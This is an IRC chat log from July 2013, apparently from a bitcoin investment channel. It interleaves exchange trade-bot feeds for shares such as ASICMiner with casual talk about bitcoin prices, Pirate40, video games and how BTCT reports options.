[BTCTC] [TAT.VIRTUALMINE] 150 @ 0.004025 = 0.6038 BTC [-] Jul 02 20:56:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.0474 = 0.237 BTC [+] Jul 02 21:01:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.047 = 0.141 BTC [-] Jul 02 21:02:17 [BTCTC] [BASIC-MINING] 2 @ 0.174497 = 0.349 BTC [+] Jul 02 21:04:18 [HAVELOCK] [SDICE] 2 @ 0.17500403 = 0.35 BTC [-] Jul 02 21:04:29 [BTCTC] [AMC-PT] 40 @ 0.001995 = 0.0798 BTC [+] Jul 02 21:04:44 lol sir reginald Jul 02 21:04:50 i like how a battlesystem is already up Jul 02 21:04:50 lol Jul 02 21:05:00 get some mocap up in dis bitch Jul 02 21:05:01 well it doesn't actually work as it is Jul 02 21:05:08 mr. spending no money on it Jul 02 21:05:11 [HAVELOCK] [ASICM] 3 @ 0.04534999 = 0.136 BTC [+] Jul 02 21:05:35 what, it's trivial to make a video out of it, whatg money ? Jul 02 21:05:45 mocap mang Jul 02 21:05:48 mocap dem animations Jul 02 21:05:53 make dat shit cray cray Jul 02 21:06:18 [HAVELOCK] [ASICM] 5 @ 0.04535 = 0.2268 BTC [+] Jul 02 21:06:29 you must have me confused with the duke nukem guy Jul 02 21:06:46 [BTCTC] [DMS.MINING] 1 @ 0.02 BTC [-] Jul 02 21:07:50 [BTCTC] [AMC-PT] 199 @ 0.001995 = 0.397 BTC [+] Jul 02 21:08:32 whats the sdice dividend for this month Jul 02 21:09:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.0474 = 0.0948 BTC [+] Jul 02 21:09:12 there's a forum thread where dooglus publishes daily results Jul 02 21:09:20 prolly something like that. Jul 02 21:09:34 [BTCTC] [TAT.VIRTUALMINE] 19 @ 0.004201 = 0.0798 BTC [+] Jul 02 21:09:40 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.0042 = 1.26 BTC [-] Jul 02 21:10:04 ;;bcstats Jul 02 21:10:09 Current Blocks: 244433 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 1518 blocks | Next Difficulty In About: 1 week, 2 days, 14 hours, 34 minutes, and 56 seconds | Next Difficulty Estimate: 23493981.721 | Estimated Percent Change: 10.11774 Jul 02 21:10:21 mircea can you comment on the bitcoin price Jul 02 21:11:42 [BTCTC] [DMS.MINING] 1 @ 0.02 BTC [-] Jul 02 21:13:22 [HAVELOCK] [ASICM] 5 @ 0.04535 = 0.2268 BTC [+] Jul 02 21:13:51 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00468 BTC [+] Jul 02 21:14:34 [HAVELOCK] [HIM] 3 @ 0.314999 = 0.945 BTC [-] Jul 02 21:14:35 [HAVELOCK] [HIM] 5 @ 0.315 = 1.575 BTC [+] Jul 02 21:14:37 [HAVELOCK] [HIM] 14 @ 0.32 = 4.48 BTC [+] Jul 02 21:14:41 nah Jul 02 21:15:48 he did? Jul 02 21:15:50 3 months ago Jul 02 21:17:58 the last comment was about losing signal Jul 02 21:19:00 bitbet growth stalling out ? Jul 02 21:20:14 [BTCTC] [AMC-PT] 500 @ 0.001997 = 0.9985 BTC [+] Jul 02 21:20:16 [BTCTC] [AMC-PT] 354 @ 0.001997 = 0.7069 BTC [+] Jul 02 21:20:49 dunno, dice rolling seems to be prefered with the current bitcoin crowd Jul 02 21:21:06 indeed Jul 02 21:21:32 so far all my mpex investments have lost $ ive only made on asicminer Jul 02 21:21:36 and so are mining bonds Jul 02 21:21:44 if that gives you any comfort Jul 02 21:21:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.0474 BTC [+] Jul 02 21:23:56 does anyone want my collection of quotes about how "i've only made money on pirate mpex sucks" or not yet. Jul 02 21:24:06 i wanna Jul 02 21:24:46 you'll probably touch them in places. Jul 02 21:24:50 lol Jul 02 21:25:13 "Pirate40 pays 7% a week, how do you think you can get away with paying any less?" Jul 02 21:26:04 that was big last april Jul 02 21:26:29 [BTCTC] [ASICMINER-PT] 1 @ 4.748913 BTC [+] Jul 02 21:26:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.0474 = 0.1896 BTC [+] Jul 02 21:26:38 [BTCTC] [TAT.ASICMINER] 21 @ 0.0474 = 0.9954 BTC [+] Jul 02 21:26:45 Pirate40 PT were all the rage Jul 02 21:26:51 i also remember if you questioned how someone could pay say, 5% a week, they would reply that that is well below average prevailing rates in bitcoinland Jul 02 21:27:00 lol, yeah Jul 02 21:27:26 good times! Jul 02 21:27:44 my business model is secret yo, if I told you it would give away my secrets Jul 02 21:27:50 [BTCTC] [AMC-PT] 70 @ 0.001998 = 0.1399 BTC [+] Jul 02 21:28:12 jborkl i wonder how well that shit will fly in particular, after s.mg sinks in a little. Jul 02 21:28:43 when is the s.mg game due for launch Jul 02 21:28:57 right after all bfl units are shipped Jul 02 21:29:06 within two weeks of that. Jul 02 21:29:08 lol Jul 02 21:29:12 so never? Jul 02 21:29:15 alternatively, there may be access to an alpha server mid july. Jul 02 21:29:41 I see shitty games doing really well, A great game launched around a innovative idea with out the developers robbing them for content will explode Jul 02 21:30:00 mircea_popescu: do you think the bitcoin price continues to go down? Jul 02 21:30:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.047 = 0.235 BTC [-] Jul 02 21:30:44 jborkl maybe. Jul 02 21:32:31 I think people are hungry for content that is not mainstream. I will never buy antoher game published by EA or Ubisoft - people get tired of being ripped off, so they stop playing at all Jul 02 21:33:08 this is very true. Jul 02 21:33:12 The COD series is perfect example of robbing for content. Jul 02 21:33:35 Same game, same engine. reskinned weapons and a few other ideas Jul 02 21:33:47 $65 plus map packs Jul 02 21:33:52 whoa 65 huh Jul 02 21:33:53 mircea_popescu: thoughts on the recent gold sell off? Jul 02 21:34:20 TraderJim i imagine it's going to get pounded to shit. Jul 02 21:34:35 politically sensitive topic, no goverfnment in history liked to see gold appreciate. Jul 02 21:34:40 jborkl: can you name where else you can have hours of fun for $65? Jul 02 21:34:55 a mroe stable economy, people feelling we are at the bottom of the bottom..less investment in gold, confidence in other areas of investment spurrs some sale of existing investment? folks not wanting to be a 'pig' Jul 02 21:35:14 COD has resued the engines and Treyarch in paticular sucks Jul 02 21:35:30 how is EA robbing for content? Jul 02 21:35:33 KRS- im pretty sure it's all fake sales tbh. Jul 02 21:35:38 some of their ideas seem a bit recycled Jul 02 21:35:43 shitty games and shitty ideas Jul 02 21:35:46 but you still cant beat the fun per dollar Jul 02 21:35:50 [BTCTC] [ASICMINER-PT] 6 @ 4.748842 = 28.4931 BTC [-] Jul 02 21:35:52 [BTCTC] [ASICMINER-PT] 1 @ 4.748843 BTC [+] Jul 02 21:35:54 [BTCTC] [ASICMINER-PT] 12 @ 4.74885 = 56.9862 BTC [+] Jul 02 21:35:56 [BTCTC] [ASICMINER-PT] 1 @ 4.749 BTC [+] Jul 02 21:35:58 [BTCTC] [ASICMINER-PT] 1 @ 4.77897 BTC [+] Jul 02 21:35:59 good games can last for years Jul 02 21:36:02 [BTCTC] [ASICMINER-PT] 1 @ 4.779 BTC [+] Jul 02 21:36:07 look at Starcraft Jul 02 21:36:08 [BTCTC] [ASICMINER-PT] 1 @ 4.793 BTC [+] Jul 02 21:36:14 [BTCTC] [ASICMINER-PT] 1 @ 4.798 BTC [+] Jul 02 21:36:15 right and you probably dont want to pay for those either Jul 02 21:36:16 [BTCTC] [ASICMINER-PT] 1 @ 4.799 BTC [+] Jul 02 21:36:17 [BTCTC] [ASICMINER-PT] 3 @ 4.82 = 14.46 BTC [+] Jul 02 21:36:21 that was a great game and the content was great Jul 02 21:36:30 yea and you downloaded a pirated copy Jul 02 21:36:37 no, I do not Jul 02 21:36:57 I played MLG for years Jul 02 21:37:00 [BTCTC] [ASICMINER-PT] 2 @ 4.879 = 9.758 BTC [+] Jul 02 21:37:05 [BTCTC] [ASICMINER-PT] 7 @ 4.88 = 34.16 BTC [+] Jul 02 21:37:10 [BTCTC] [ASICMINER-PT] 1 @ 4.8879 BTC [+] Jul 02 21:37:12 [BTCTC] [ASICMINER-PT] 1 @ 4.8879 BTC [+] Jul 02 21:37:15 FPS though\ Jul 02 21:37:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0465 BTC [-] Jul 02 21:37:18 mircea_popescu: comment on dollar vs euro Jul 02 21:38:01 [BTCTC] [TAT.ASICMINER] 84 @ 0.047 = 3.948 BTC [+] Jul 02 21:38:11 what am i, mafalda ?! Jul 02 21:38:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.046 = 0.46 BTC [-] Jul 02 21:38:20 [BTCTC] [AMC-PT] 10 @ 0.001998 = 0.02 BTC [+] Jul 02 21:38:43 wow rly Jul 02 21:39:03 Don Popescu Jul 02 21:39:05 mircea_popescu: comment on the comment plz Jul 02 21:39:17 vbs i think most definitely! Jul 02 21:39:24 hehehe Jul 02 21:39:40 [BTCTC] [RSM] 6 @ 0.019674 = 0.118 BTC [+] Jul 02 21:40:36 [BTCTC] [ASICMINER-PT] 2 @ 4.888 = 9.776 BTC [+] Jul 02 21:40:38 [BTCTC] [ASICMINER-PT] 6 @ 4.8888 = 29.3328 BTC [+] Jul 02 21:41:01 [BTCTC] [ASICMINER-PT] 39 @ 4.8879 = 190.6281 BTC [-] Jul 02 21:41:10 yeesh Jul 02 21:41:58 [HAVELOCK] [ASICM] 32 @ 0.04535 = 1.4512 BTC [+] Jul 02 21:42:33 [BTCTC] [TAT.ASICMINER] 54 @ 0.047 = 2.538 BTC [+] Jul 02 21:42:35 [BTCTC] [TAT.ASICMINER] 9 @ 0.047132 = 0.4242 BTC [+] Jul 02 21:42:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.0475 = 0.475 BTC [+] Jul 02 21:42:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.0478 = 0.478 BTC [+] Jul 02 21:42:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.04783 = 0.1435 BTC [+] Jul 02 21:42:39 [BTCTC] [TAT.ASICMINER] 40 @ 0.047849 = 1.914 BTC [+] Jul 02 21:42:41 [BTCTC] [TAT.ASICMINER] 32 @ 0.04798 = 1.5354 BTC [+] Jul 02 21:42:42 [BTCTC] [TAT.ASICMINER] 92 @ 0.04799 = 4.4151 BTC [+] Jul 02 21:43:29 [HAVELOCK] [ASICM] 3 @ 0.04500001 = 0.135 BTC [-] Jul 02 21:43:30 [HAVELOCK] [ASICM] 500 @ 0.045 = 22.5 BTC [-] Jul 02 21:43:35 [BTCTC] [ASICMINER-PT] 1 @ 4.888 BTC [+] Jul 02 21:43:37 [BTCTC] [ASICMINER-PT] 1 @ 4.8888 BTC [+] Jul 02 21:44:07 meanwhile Burnside hasn't processed withdrawals for like 14 hours now :( Jul 02 21:44:14 how's a man sposed to arb Jul 02 21:45:01 [BTCTC] [ASICMINER-PT] 1 @ 4.8888 BTC [+] Jul 02 21:47:27 [BTCTC] [ASICMINER-PT] 1 @ 4.888 BTC [-] Jul 02 21:47:32 are the owners of bitbet doing anything to promote shareholder value Jul 02 21:47:33 [BTCTC] [S.DICE-PT] 18 @ 0.002347 = 0.0422 BTC [+] Jul 02 21:47:38 weve seen the price decline by over 50% now Jul 02 21:48:30 we've what ?! Jul 02 21:48:56 [HAVELOCK] [ASICM] 10 @ 0.04535 = 0.4535 BTC [+] Jul 02 21:49:15 "seen the price decline by over 50% now" Jul 02 21:50:19 [BTCTC] [ASICMINER-PT] 2 @ 4.888 = 9.776 BTC [-] Jul 02 21:50:24 it opened at 1000 iirc. Jul 02 21:50:27 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00468 = 0.0094 BTC [+] Jul 02 21:51:00 [BTCTC] [ASICMINER-PT] 6 @ 4.8888 = 29.3328 BTC [+] Jul 02 21:52:52 [BTCTC] [CRYPTO-TRADE] 75 @ 0.2 = 15 BTC [+] Jul 02 21:54:14 [BTCTC] [BASIC-MINING] 8 @ 0.174497 = 1.396 BTC [+] Jul 02 21:57:22 [BTCTC] [BASIC-MINING] 3 @ 0.174498 = 0.5235 BTC [+] Jul 02 21:57:51 [BTCTC] [BASIC-MINING] 8 @ 0.174497 = 1.396 BTC [-] Jul 02 21:58:40 [BTCTC] [BASIC-MINING] 2 @ 0.174497 = 0.349 BTC [-] Jul 02 21:58:42 [BTCTC] [BASIC-MINING] 7 @ 0.1745 = 1.2215 BTC [+] Jul 02 22:00:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.04789 = 0.0958 BTC [-] Jul 02 22:00:03 [BTCTC] [BASIC-MINING] 2 @ 0.174497 = 0.349 BTC [-] Jul 02 22:00:19 [HAVELOCK] [ASICM] 98 @ 0.04535 = 4.4443 BTC [+] Jul 02 22:01:13 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Jul 02 22:03:05 [BTCTC] [DMS.MINING] 10 @ 0.019 = 0.19 BTC [-] Jul 02 22:03:54 [HAVELOCK] [ASICM] 267 @ 0.04535 = 12.1085 BTC [+] Jul 02 22:04:01 [HAVELOCK] [ASICM] 395 @ 0.04548898 = 17.9681 BTC [+] Jul 02 22:04:09 [HAVELOCK] [ASICM] 1 @ 0.04548998 BTC [+] Jul 02 22:04:16 [HAVELOCK] [ASICM] 100 @ 0.0458 = 4.58 BTC [+] Jul 02 22:04:21 [HAVELOCK] [ASICM] 3 @ 0.04589997 = 0.1377 BTC [+] Jul 02 22:04:43 [BTCTC] [DMS.MINING] 41 @ 0.02 = 0.82 BTC [+] Jul 02 22:04:45 [HAVELOCK] [ASICM] 300 @ 0.04589998 = 13.77 BTC [+] Jul 02 22:04:47 [BTCTC] [TAT.ASICMINER] 50 @ 0.0477 = 2.385 BTC [-] Jul 02 22:04:58 [HAVELOCK] [ASICM] 30 @ 0.04589998 = 1.377 BTC [+] Jul 02 22:05:22 [BTCTC] [TAT.ASICMINER] 30 @ 0.047 = 1.41 BTC [-] Jul 02 22:05:35 [HAVELOCK] [ASICM] 1 @ 0.04589998 BTC [+] Jul 02 22:05:38 [BTCTC] [DMS.MINING] 60 @ 0.020499 = 1.2299 BTC [+] Jul 02 22:05:38 [BTCTC] [DMS.MINING] 50 @ 0.020499 = 1.025 BTC [+] Jul 02 22:06:11 [BTCTC] [TAT.ASICMINER] 30 @ 0.04701 = 1.4103 BTC [+] Jul 02 22:06:34 [BTCTC] [DMS.MINING] 93 @ 0.0205 = 1.9065 BTC [+] Jul 02 22:06:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.04701 = 0.4701 BTC [+] Jul 02 22:07:01 [BTCTC] [TAT.ASICMINER] 30 @ 0.047 = 1.41 BTC [-] Jul 02 22:08:49 [BTCTC] [DMS.MINING] 14 @ 0.0209 = 0.2926 BTC [+] Jul 02 22:10:07 [BTCTC] [S.DICE-PT] 1 @ 0.002347 BTC [+] Jul 02 22:11:09 [BTCTC] [GSDPT] 7 @ 0.00219 = 0.0153 BTC [-] Jul 02 22:13:33 [BTCTC] [GSDPT] 6 @ 0.00238 = 0.0143 BTC [+] Jul 02 22:15:27 [BTCTC] [GSDPT] 6 @ 0.00238 = 0.0143 BTC [+] Jul 02 22:15:44 [BTCTC] [S.MPOE-PT] 4 @ 0.001 = 0.004 BTC [+] Jul 02 22:17:07 [BTCTC] [DMS.PURCHASE] 5 @ 0.049338 = 0.2467 BTC [+] Jul 02 22:18:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.047699 = 0.1431 BTC [+] Jul 02 22:19:19 [BTCTC] [TAT.ASICMINER] 57 @ 0.047699 = 2.7188 BTC [+] Jul 02 22:19:21 [BTCTC] [TAT.ASICMINER] 43 @ 0.0477 = 2.0511 BTC [+] Jul 02 22:19:44 https://bitcointalk.org/index.php?topic=248231.0;topicseen Jul 02 22:19:49 MTGOX is drowning, we are gonna see bottom soon Jul 02 22:20:35 dunno if rubbish Jul 02 22:22:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0477 BTC [+] Jul 02 22:22:39 [BTCTC] [TAT.ASICMINER] 40 @ 0.0477 = 1.908 BTC [+] Jul 02 22:22:50 [BTCTC] [DMS.PURCHASE] 57 @ 0.049338 = 2.8123 BTC [+] Jul 02 22:24:17 [BTCTC] [ASICMINER-PT] 1 @ 4.869 BTC [-] Jul 02 22:24:51 [BTCTC] [ASICMINER-PT] 4 @ 4.869 = 19.476 BTC [-] Jul 02 22:25:16 [BTCTC] [ASICMINER-PT] 1 @ 4.865 BTC [-] Jul 02 22:25:41 [BTCTC] [ASICMINER-PT] 1 @ 4.865 BTC [-] Jul 02 22:26:20 [BTCTC] [ASICMINER-PT] 1 @ 4.869 BTC [+] Jul 02 22:26:29 [BTCTC] [S.MPOE-PT] 30 @ 0.000999 = 0.03 BTC [-] Jul 02 22:26:49 [BTCTC] [ASICMINER-PT] 1 @ 4.8699 BTC [+] Jul 02 22:27:19 [BTCTC] [ASICMINER-PT] 1 @ 4.87 BTC [+] Jul 02 22:27:52 [BTCTC] [ASICMINER-PT] 2 @ 4.872 = 9.744 BTC [+] Jul 02 22:27:53 [BTCTC] [ASICMINER-PT] 5 @ 4.8725 = 24.3625 BTC [+] Jul 02 22:27:55 [BTCTC] [ASICMINER-PT] 2 @ 4.876 = 9.752 BTC [+] Jul 02 22:27:57 [BTCTC] [ASICMINER-PT] 1 @ 4.879 BTC [+] Jul 02 22:27:59 [BTCTC] [ASICMINER-PT] 2 @ 4.8879 = 9.7758 BTC [+] Jul 02 22:28:01 [BTCTC] [ASICMINER-PT] 1 @ 4.88799 BTC [+] Jul 02 22:28:03 [BTCTC] [ASICMINER-PT] 2 @ 4.888 = 9.776 BTC [+] Jul 02 22:28:05 [BTCTC] [ASICMINER-PT] 1 @ 4.8888 BTC [+] Jul 02 22:28:07 [BTCTC] [ASICMINER-PT] 1 @ 4.889 BTC [+] Jul 02 22:28:13 [BTCTC] [ASICMINER-PT] 15 @ 4.89 = 73.35 BTC [+] Jul 02 22:28:16 [BTCTC] [ASICMINER-PT] 1 @ 4.9 BTC [+] Jul 02 22:28:22 [BTCTC] [ASICMINER-PT] 1 @ 4.9 BTC [+] Jul 02 22:28:25 [BTCTC] [ASICMINER-PT] 10 @ 4.9 = 49 BTC [+] Jul 02 22:28:30 to the top! Jul 02 22:28:32 [BTCTC] [ASICMINER-PT] 19 @ 4.9 = 93.1 BTC [+] Jul 02 22:28:37 [BTCTC] [ASICMINER-PT] 3 @ 4.94 = 14.82 BTC [+] Jul 02 22:28:41 [BTCTC] [ASICMINER-PT] 1 @ 4.9489 BTC [+] Jul 02 22:28:44 [BTCTC] [TAT.ASICMINER] 102 @ 0.0477 = 4.8654 BTC [+] Jul 02 22:28:47 [BTCTC] [ASICMINER-PT] 7 @ 4.949 = 34.643 BTC [+] Jul 02 22:28:49 [BTCTC] [ASICMINER-PT] 7 @ 4.95 = 34.65 BTC [+] Jul 02 22:28:51 [BTCTC] [ASICMINER-PT] 2 @ 4.95 = 9.9 BTC [+] Jul 02 22:28:51 wtf Jul 02 22:28:56 are we breaking 5.0 tonight? Jul 02 22:28:59 yep Jul 02 22:29:04 [BTCTC] [ASICMINER-PT] 1 @ 4.979 BTC [+] Jul 02 22:29:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0477 BTC [+] Jul 02 22:29:08 [BTCTC] [ASICMINER-PT] 1 @ 4.979 BTC [+] Jul 02 22:29:15 [BTCTC] [ASICMINER-PT] 8 @ 4.98 = 39.84 BTC [+] Jul 02 22:29:19 [BTCTC] [ASICMINER-PT] 1 @ 4.98 BTC [+] Jul 02 22:29:20 ThickAsThieves remember when I bought some shares from you at 3.5 and I wasn't too sure? Jul 02 22:29:22 [BTCTC] [ASICMINER-PT] 1 @ 4.988 BTC [+] Jul 02 22:29:24 [BTCTC] [ASICMINER-PT] 1 @ 4.9899 BTC [+] Jul 02 22:29:49 hehe Jul 02 22:29:54 [BTCTC] [S.MPOE-PT] 30 @ 0.000999 = 0.03 BTC [-] Jul 02 22:30:09 i remember posting an auction at 2.6 which was like .1 over the previous auction Jul 02 22:30:11 no bids Jul 02 22:30:14 people bitched Jul 02 22:30:14 whats the market cap btw Jul 02 22:30:18 i forgot Jul 02 22:30:22 400k shares Jul 02 22:30:23 for am Jul 02 22:30:23 like 2mn btc by now Jul 02 22:30:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.0475 = 0.475 BTC [-] Jul 02 22:30:41 [BTCTC] [TAT.ASICMINER] 250 @ 0.0477 = 11.925 BTC [+] Jul 02 22:30:56 [HAVELOCK] [ASICM] 16 @ 0.044712 = 0.7154 BTC [-] Jul 02 22:31:16 [BTCTC] [ASICMINER-PT] 4 @ 4.87 = 19.48 BTC [-] Jul 02 22:31:20 [BTCTC] [ASICMINER-PT] 4 @ 4.98 = 19.92 BTC [+] Jul 02 22:31:27 [BTCTC] [ASICMINER-PT] 1 @ 4.989 BTC [+] Jul 02 22:31:33 [HAVELOCK] [HIM] 2 @ 0.32 = 0.64 BTC [+] Jul 02 22:31:52 [BTCTC] [TAT.ASICMINER] 54 @ 0.04799 = 2.5915 BTC [+] Jul 02 22:32:37 [BTCTC] [DMS.SELLING] 100 @ 0.03 = 3 BTC [+] Jul 02 22:33:15 [BTCTC] [AMC-PT] 25 @ 0.001998 = 0.05 BTC [+] Jul 02 22:34:01 [BTCTC] [DMS.SELLING] 1 @ 0.031809 BTC [+] Jul 02 22:34:09 damn they are talking some harcore satoshi in #bitsofproof Jul 02 22:34:23 [BTCTC] [DMS.PURCHASE] 100 @ 0.049338 = 4.9338 BTC [+] Jul 02 22:34:38 what's #bitsofproof Jul 02 22:35:01 [BTCTC] [AMC-PT] 12 @ 0.001998 = 0.024 BTC [+] Jul 02 22:37:51 [BTCTC] [AMC-PT] 40 @ 0.001998 = 0.0799 BTC [+] Jul 02 22:38:34 [HAVELOCK] [KCIM] 1 @ 1.03 BTC [+] Jul 02 22:39:05 [BTCTC] [AMC-PT] 2236 @ 0.001998 = 4.4675 BTC [+] Jul 02 22:40:05 [BTCTC] [AMC-PT] 1500 @ 0.001999 = 2.9985 BTC [+] Jul 02 22:40:06 [BTCTC] [AMC-PT] 310 @ 0.002 = 0.62 BTC [+] Jul 02 22:40:12 [BTCTC] [AMC-PT] 4 @ 0.002 = 0.008 BTC [+] Jul 02 22:40:13 [BTCTC] [AMC-PT] 1071 @ 0.002 = 2.142 BTC [+] Jul 02 22:41:35 [BTCTC] [ASICMINER-PT] 10 @ 3.55 = 35.5 BTC [-] Jul 02 22:41:50 wait Jul 02 22:41:56 wasn't it 5 ? Jul 02 22:41:58 [BTCTC] [BITVPS] 6 @ 0.00093 = 0.0056 BTC [+] Jul 02 22:42:15 [BTCTC] [ASICMINER-PT] 10 @ 3.55 = 35.5 BTC [-] Jul 02 22:42:23 Options Jul 02 22:44:36 [HAVELOCK] [ASICM] 16 @ 0.045899 = 0.7344 BTC [+] Jul 02 22:44:47 bitangels chat Jul 02 22:44:54 investment group Jul 02 22:45:41 similar to #bitbank and #bitangels Jul 02 22:45:46 oooky. Jul 02 22:47:21 ThickAsThieves can you explain this options thing ? Jul 02 22:49:25 when someone excercises an option on BTCT (enabled for ALL assets), it shows the strike price in the bot Jul 02 22:50:05 why would someone exercise an option so far undermarket ? Jul 02 22:50:13 o wait. it shows the STRIKE price ? Jul 02 22:50:23 [BTCTC] [TAT.ASICMINER] 16 @ 0.048 = 0.768 BTC [+] Jul 02 22:50:30 yeah Jul 02 22:50:36 who came up with this. Jul 02 22:50:42 hehe Jul 02 22:51:08 anyone can write CALLS or PUTS Jul 02 22:51:18 it locks up the shares/btc as appropriate Jul 02 22:51:31 they can also be rewritten once purchased Jul 02 22:51:42 BF does the same thing Jul 02 22:52:03 who came up with reporting the strike rather than the settlement price. Jul 02 22:52:30 my guess is it's a shortcoming of how it's finalized Jul 02 22:52:31 oh, on the grounds that technically it's a conveyance for that price. meh. Jul 02 22:52:39 probly shouldnt be reported at all Jul 02 22:52:46 if they report it as shares should report strike +- premium Jul 02 22:53:03 at the very least. or else yeah, not really room in the underlying for reporting derivative events Jul 02 22:53:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.04851 BTC [+] Jul 02 22:53:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.04851 BTC [+] Jul 02 22:54:17 [HAVELOCK] [ASICM] 2 @ 0.04589998 = 0.0918 BTC [+] Jul 02 22:54:50 [BTCTC] [TAT.ASICMINER] 90 @ 0.048699 = 4.3829 BTC [+] Jul 02 22:55:01 [HAVELOCK] [ASICM] 2 @ 0.04589998 = 0.0918 BTC [+] Jul 02 22:57:16 [HAVELOCK] [ASICM] 8 @ 0.04589998 = 0.3672 BTC [+] Jul 02 22:59:22 [BTCTC] [DMS.SELLING] 16 @ 0.029311 = 0.469 BTC [-] Jul 02 22:59:40 [HAVELOCK] [ASICM] 5 @ 0.04589998 = 0.2295 BTC [+] Jul 02 22:59:56 ;;tslb Jul 02 22:59:57 Time since last block: 15 minutes and 38 seconds Jul 02 23:03:04 [BTCTC] [TAT.ASICMINER] 13 @ 0.0485 = 0.6305 BTC [-] Jul 02 23:07:39 [BTCTC] [BASIC-MINING] 1 @ 0.1745 BTC [+] Jul 02 23:07:41 [BTCTC] [BASIC-MINING] 2 @ 0.17995 = 0.3599 BTC [+] Jul 02 23:08:19 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004251 = 0.0425 BTC [-] Jul 02 23:10:32 [BTCTC] [ASICMINER-PT] 2 @ 4.953999 = 9.908 BTC [+] Jul 02 23:10:34 [BTCTC] [AMC-PT] 50 @ 0.00181 = 0.0905 BTC [-] Jul 02 23:12:17 [BTCTC] [AMC-PT] 25 @ 0.00181 = 0.0453 BTC [-] Jul 02 23:12:19 [BTCTC] [AMC-PT] 455 @ 0.0018 = 0.819 BTC [-] Jul 02 23:15:22 [BTCTC] [TAT.ASICMINER] 20 @ 0.049 = 0.98 BTC [+] Jul 02 23:16:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.049 BTC [+] Jul 02 23:16:38 [BTCTC] [ASICMINER-PT] 1 @ 4.899 BTC [-] Jul 02 23:16:39 [BTCTC] [TAT.ASICMINER] 16 @ 0.049 = 0.784 BTC [+] Jul 02 23:16:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.049 = 0.147 BTC [+] Jul 02 23:16:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.049 = 0.245 BTC [+] Jul 02 23:16:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.049499 = 0.495 BTC [+] Jul 02 23:16:47 [BTCTC] [TAT.ASICMINER] 5 @ 0.049499 = 0.2475 BTC [+] Jul 02 23:19:38 [BTCTC] [TAT.ASICMINER] 40 @ 0.049598 = 1.9839 BTC [+] Jul 02 23:20:57 @mircea_popescu This is 32dsplease from reddit :D Jul 02 23:21:21 Thats Mrs32DsReddit for coming! Jul 02 23:22:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0484 BTC [-] Jul 02 23:22:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0483 BTC [-] Jul 02 23:22:06 [BTCTC] [TAT.ASICMINER] 50 @ 0.048201 = 2.4101 BTC [-] Jul 02 23:22:15 [BTCTC] [TAT.ASICMINER] 50 @ 0.0482 = 2.41 BTC [-] Jul 02 23:22:18 [BTCTC] [TAT.ASICMINER] 310 @ 0.0482 = 14.942 BTC [-] Jul 02 23:22:20 [HAVELOCK] [ASICM] 238 @ 0.04589998 = 10.9242 BTC [+] Jul 02 23:22:21 [BTCTC] [TAT.ASICMINER] 184 @ 0.048 = 8.832 BTC [-] Jul 02 23:22:22 [HAVELOCK] [ASICM] 3 @ 0.04589999 = 0.1377 BTC [+] Jul 02 23:22:23 [HAVELOCK] [ASICM] 445 @ 0.0459 = 20.4255 BTC [+] Jul 02 23:22:25 [BTCTC] [TAT.ASICMINER] 90 @ 0.048 = 4.32 BTC [-] Jul 02 23:22:28 Mrs32DsReddit heya Jul 02 23:22:39 [HAVELOCK] [ASICM] 40 @ 0.0459 = 1.836 BTC [+] Jul 02 23:22:55 [HAVELOCK] [ASICM] 100 @ 0.0459 = 4.59 BTC [+] Jul 02 23:23:05 I am interested in your proposition :) What did you have in mind? Jul 02 23:23:23 [BTCTC] [PAJKA.BOND] 9 @ 0.058799 = 0.5292 BTC [+] Jul 02 23:23:47 you know when someone pms you you get a different tab Jul 02 23:24:13 [BTCTC] [PAJKA.BOND] 15 @ 0.06 = 0.9 BTC [+] Jul 02 23:24:32 [HAVELOCK] [ASICM] 9 @ 0.0459 = 0.4131 BTC [+] Jul 02 23:24:33 A different tab? Jul 02 23:24:49 yes indeed. up by the url Jul 02 23:25:19 found it ? Jul 02 23:26:53 [BTCTC] [ESECURITYSABTC] 2 @ 0.230001 = 0.46 BTC [-] Jul 02 23:27:19 [BTCTC] [DMS.MINING] 20 @ 0.020399 = 0.408 BTC [-] Jul 02 23:28:23 [BTCTC] [DMS.MINING] 25 @ 0.0204 = 0.51 BTC [+] Jul 02 23:29:08 [BTCTC] [DMS.MINING] 14 @ 0.020399 = 0.2856 BTC [-] Jul 02 23:29:10 [BTCTC] [DMS.MINING] 18 @ 0.0205 = 0.369 BTC [+] Jul 02 23:29:35 [BTCTC] [BASIC-MINING] 1 @ 0.17995 BTC [+] Jul 02 23:30:34 [BTCTC] [DMS.MINING] 2 @ 0.0205 = 0.041 BTC [+] Jul 02 23:30:35 [BTCTC] [DMS.MINING] 8 @ 0.0205 = 0.164 BTC [+] Jul 02 23:30:49 [BTCTC] [ASICMINER-PT] 1 @ 4.8 BTC [-] Jul 02 23:30:59 [HAVELOCK] [ASICM] 100 @ 0.0459 = 4.59 BTC [+] Jul 02 23:31:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.0475 = 0.1425 BTC [-] 